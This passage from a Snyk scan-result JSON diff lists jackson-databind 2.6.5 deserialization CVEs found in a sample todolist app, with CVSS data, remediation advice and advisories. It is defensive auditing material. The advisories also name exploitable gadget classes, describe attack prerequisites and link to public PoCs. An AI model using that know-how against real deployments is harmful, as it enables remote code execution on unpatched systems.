Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub 